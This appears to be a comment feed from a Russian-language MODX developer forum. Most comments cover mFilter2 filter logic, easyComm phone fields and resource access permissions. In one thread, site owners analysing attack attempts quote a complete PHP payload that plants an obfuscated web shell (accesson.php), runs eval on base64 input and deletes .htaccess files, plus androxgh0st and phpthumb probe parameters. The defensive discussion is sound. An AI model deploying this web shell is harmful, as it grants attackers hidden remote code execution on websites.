Всего 123 767 комментариев

Арман
Арман
12 марта 2024, 13:05
0
Я посмотрел вроде он также пытался создать пользователя но у него не получилось. Sql-иньекцию пытались сделать только 1 раз 11 марта судя по почте. С этим всё понятно а что значат остальные сообщения. Которые приходят уже почти неделю с разным временем и количеством каждый день. Такие вот 3 сообщения

debug: true

0x:androxgh0st

config_prefer_imagemagick: 0
src: http
f: php
action: web/phpthumb
useRawIMoutput: 1
IMresizedData:
/
Наумов Алексей
Наумов Алексей
12 марта 2024, 12:42
0
Хорошо бы отловить запросы на сервер и данные в них, которые приводят к такому поведению.

А так да, прям попыточка взломать всё.

К примеру видны попытки вытащить таблицу пользователей, попытки создания сниппетов, типа такого

$s = $_SERVER['DOCUMENT_ROOT'].'/assets/';$s1 = $s.'images/';mkdir($s1,511);$fh = fopen($s1.'accesson.php', 'w');fwrite($fh, '<?=409723*20;if(md5($_COOKIE[d])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST[id]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>');fclose($fh);unlink($s.'.htaccess');unlink($s1.'.htaccess');
беглый поиск по «accesson.php» показывает, что так ломали сайты на modx еще с версии 2,6,4, когда были уязвимости найдены…
/
Наумов Алексей
Наумов Алексей
12 марта 2024, 12:36
0
Касательно второй строчки здесь
2. Цвет
— Красный
— Синий, Красный
— Синий
стоит посмотреть на параметр values_delimeter сниппета mFilter2. В нем по умолчанию запятая, и такая же запятая стоит в значении опции. Я в этом параметре обычно указываю точку с запятой.
/
Арман
Арман
12 марта 2024, 11:19
0
SQL-инъекции начали приходить недавно. А до этого приходило следующее.

12:50
config_prefer_imagemagick: 0
src: http
f: php
action: web/phpthumb
useRawIMoutput: 1
IMresizedData:
/
Артур Шевченко
Артур Шевченко
12 марта 2024, 09:28
+1
Больше похоже на попытку SQL-инъекции.
/
Evgeny Epifanov
Evgeny Epifanov
11 марта 2024, 23:30
0
То, что Вы описываете присуще типу опции множественный список. В моем случае список с авто дополнением. Из примера выше, получим 2 блока с чекбоксами:
1. Размер
— XL
2. Цвет
— Красный
— Синий, Красный
— Синий
И при выборе «Синий, Красный» будет показана оба товара, т.к. сработало условие по принципу ИЛИ
Как мне кажется, так не должно быть.
/
Наумов Алексей
Наумов Алексей
11 марта 2024, 23:09
0
Все правильно работает.
Допустим 2 товара:
1. Размер — XL, Цвет — Синий, Красный.
1. Размер — XL, Цвет — Синий.

Ты ставишь в фильтре размер XL — видим оба товара, т.к. они есть размера XL.
Добавляем галочку Синий — видим оба товара, т.к. они есть размера XL и синего цвета.
Ставим галочку Красный — видим оба товара, т.к. по логике компонента мы хотим увидеть товары, которые размера XL, а цвет нас интересует и синий и красный, т.е. любой из них (синий ИЛИ красный).

Если нужно в 3м случае видеть только товар 1 — то придется дописывать свою логику, mFilter2 так не может.
Но! тогда представь, что будет, если у тебя есть еще Товар 3 размера L. В этом случае, ты выбираешь себе джинсы, но знаешь, что на тебе хорошо сидит то L, то XL, смотря от бренда. Ставишь обе галочки — и что? Товаров будет 0, вряд ли ты этого ждал.
/
Evgeny Epifanov
Evgeny Epifanov
11 марта 2024, 21:50
0
Спасибо за ответ. Я и сам уверен, что так и должно быть, но… факт.
Буду искать, что у меня не так. Теперь я, хоть понимаю куда искать)
/
Артур Шевченко
Артур Шевченко
11 марта 2024, 20:08
0
Попробуй поиграть с приоритетами плагинов
/
Артур Шевченко
Артур Шевченко
11 марта 2024, 19:54
0
Не знаю расстроишься ты или обрадуешься, но «из коробки» mFilter2 фильтрует по условию И. Если у тебя не так то, либо кто-то написал свой класс фильтрации, либо что-то у тебя не правильно настроено.
/
Наумов Алексей
Наумов Алексей
11 марта 2024, 19:19
+1
Привет! Ну как-то сказать, чтобы intl-tel-input записывал номер телефона в скрытое поле user_contacts. Родное поле (которое в стандартной форме easyComm есть) убрать конечно же, чтобы не дублировалось.
Не забыть указать поле user_contacts в параметре allowedFields сниппета ecForm.
/
Владислав
Владислав
11 марта 2024, 17:57
0
Эх, было бы классно пересечься спустя 8 (?!) лет после Минска…
Но боюсь, это несколько сложнее, чем поездка в Белорусь(
/
Никита
Никита
11 марта 2024, 16:32
0
Приветствую, столкнулся с такой задачей. Нужно сохранять номер телефона с кодом страны, сайт мультиязычный. Код стран реализован через intl-tel-input.
Не могу понять как мне реализовать это через ключ {user_contacts}

При отправке формы intl-tel-input записывает номер телефона в скрытое поле 
<input type="hidden" name="full-phone" value="+37251234567">
/
Leonid Krylov
Leonid Krylov
11 марта 2024, 15:16
+2
Я буду!
/
Maks
Maks
11 марта 2024, 08:09
0
Подскажите пожалуйста а как вывести в чанке статьи категории к которым эта статья привязана?
/
Кирилл
Кирилл
10 марта 2024, 17:38
0
Случайно не нашли решение?
/
Олег
Олег
10 марта 2024, 15:19
0
Нашел похожий случай и решение.
Вывод фильтров и результатов надо делать не в чанк tpl.mFilter2.outer, а прямо в шаблон. Иначе не работает.
/
Александр Мельник
Александр Мельник
10 марта 2024, 13:43
0
Примерно такого поведения я и ожидал, как вы описали.
Не понимаю почему, но у меня получилось все в точности наоборот. Во-первых, применение группы ресурсов к группе пользователей ровным счетом ничего не меняет (и да, я выбирал политики доступа разные, в том числе и Resource как на вашем скрине). Пользователь в этой группе продолжает видеть в дереве все ресурсы. А вот удаление группы ресурсов из группы пользователей вдруг вызывает странное поведение — в дереве ресурсов явно начинает работать ограничение (почему? я ведь удалил группу ресурсов из группы пользователей). И плюс в дереве ресурсов вдруг оказывается тот ресурс, который я наоборот хотел скрыть.
/
Сергей Карпович
Сергей Карпович
10 марта 2024, 10:46
0
Как то делал доступ копирайтеру только к разделу Блога.
Также создал группу ресурсов для него, в эту группу перетащил раздел блог.
Далее в настройках группы пользователя выставил такие настройки:
disk.yandex.ru/d/g1FrSMBc0pkMtg

В итоге копирайтер в админке видит в ресурсах только блог
/
Олег
Олег
10 марта 2024, 01:13
0
Как только добавляю в вызов mFilter2 команду &toSeparatePlaceholders=`my` получаю пустую страницу. т.е. шапка и подвал присутствуют, но содержимое с фильтром не отображается. В техподдержку написал, но пока тишина.
Никто не сталкивался?
/